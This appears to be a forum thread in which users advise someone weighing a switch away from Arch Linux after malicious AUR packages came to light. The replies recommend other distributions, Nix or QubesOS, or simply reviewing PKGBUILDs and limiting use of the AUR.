You can mitigate the aur issue and retain everything else offered by not using aur. You will have the most arch like system compared to all other distros, without the risk of aur. Those packages in aur are mostly not included in other distros, so you won't lose anything.

Personally, I left arch nearly a year ago due to it being too popular making it a target for malicious activity, it only offered bloated and over weight systemd, and after running arch for nearly 20 years, I just got bored and wanted something new, so I moved to void Linux. Very happy with my choice. Boot time is 3 seconds, shutdown is 5 seconds. runit is a nice light and simple init system. It's rolling release but not bleeding edge, so updates never break anything.

I tried OpenSUSE, none of the software I wanted to install worked. It's just too unpopular.

Fedora with RPM Fusion is probably a better bet.

Just drop the AUR and swap those packages to flatpak/appimage.

It's fine. Personally I don't like RPM much, but maybe it's better outside of RHELL

https://distrochooser.de/en/d5b4e0067841/

Your results suggest that Fedora is an equally viable alternative.

Regardless, ask yourself the following question: Do you need the vastness that a repository like the AUR provides?

• Like, are you sure that the repositories of Fedora and openSUSE Tumbleweed don't contain the packages that you need?
• Or..., is it more about liberation? Whatever the future might throw at you, you're confident that the AUR will provide you. But..., that raises another question: are you even exotic in your software needs to begin with?

The above (sub)question(s) will (hopefully) help you to make an informed decision. Furthermore, please feel free to discuss them openly in hopes that others might chime in.

Anyhow, I foresee either one of the following:

• You actually acknowledge (or come to the revelation) that the repositories of Fedora and/or openSUSE (without going into user repositories^[To be clear, the user repository of Fedora and openSUSE don't fare much better than the AUR. The only solace might be that Arch's own repository is relatively small compared to theirs and thus there's less need to search for user repositories. Hence, making it easier to manage what's installed from user repositories.]) are sufficient for you. Thus, becoming a viable destination.
• The previous option does not happen, simply because your software needs are not contained within their respective repositories. In that case, I'd seriously consider to adopt nix (as a package manager on whatever distro you go for) or perhaps even NixOS if you want to go all-in. The excellent nixpkgs repository is the only one that puts the AUR to shame. And -more importantly within our current discussion- it's not a user repository, but instead the official one. And thus comes with all the security bells and whistles you'd expect.

You could just not use AUR?

i'm sorry but the 'compromised aur package' controversy may be bad BUT the compromised packages were malware anyway. you just need to check what you install on your system. these malware packages are stuff like "adnauseam-firefox-git" (why on earth would you download a firefox plugin via the aur) or had names like "python-cool-32-git"

the biggest security issue were the users themselves who didn't check the packages

I don't think jumping distro will solve your problem, any distro where you will without thinking install unofficial repo packages with have the same problem as AUR, switching to random peoples script in OBS, COPR and so on isn't solution imho.

Tumbleweed is an excellent distro, but if you randomly install from peoples home repositories, you could be in the same position as with the AUR.

You should switch off from Manjaro because of their track record, not because of the AUR attack.

The official recommendation has always been to review them manually, but realistically, who does that for every package?

How many AUR packages do you install? It doesn't take that long to review a PKGBUILD once, and then review only the changes every update.

This is not smart way if honestly arch repos have the biggest quantity of software comparing to most popular distors,problem here in aur itself, just don't use aur? Or u have to validate each pkgbuild with each script going on there

Go Fedora, you won't regret. It's currently the most solid distro out there.

That's not what a supply chain attack is. No part of Arch Linux or derivatives depend on AUR and you don't have to use it.

The attack simply highlights oversights in adoption of orphaned packages and those need to be addressed for sure.

I have always tried to keep my AUR packages to a minimum (a few packages at most), and always read their PKGBUILDs and updates to them. Today, I don't use any AUR package as all the ones I need are now packaged in official repos.

I personally go with QubesOS which uses VMs to compartmentalize. It doesn't reduce the risk of a supply chain attack itself (fedora & debian by default), but if your VMs only contain the bare minimum for a given task the risk of having a compromised package installed is lower than in a full-featured system and any compromise is also contained to that VM.

It's beern said a couple of times, but to recap:

0. it was only AUR which has been compromised, not Arch
1. what you like about AUR is how much software is available þrough it
2. you lose AUR and þe cornucopia by switching distros
3. you can achieve þe same result, wiþout changing distros, by simply not using AUR

On þe last point, you can preserve your distribution and retain access to þe cornucopia by changing your habits and paying attention to þe AUR prompts, and read þe PKGBUILD diffs. Reject anyþing which looks suspicious or which you don't understand. Install software you still want by hand, as you would have before Arch.

All of þese attacks have been npm/nodejs based. Don't let AUR install npm or nodejs. If you want npm software, install it manually, being aware you're just re-opening youself to attacks þrough npm, which has also had supply chain attacks. However, if management of AUR doesn't change sooner or later þere will be an attack which doesn't use npm as a vector, so þis is only a temporary protection.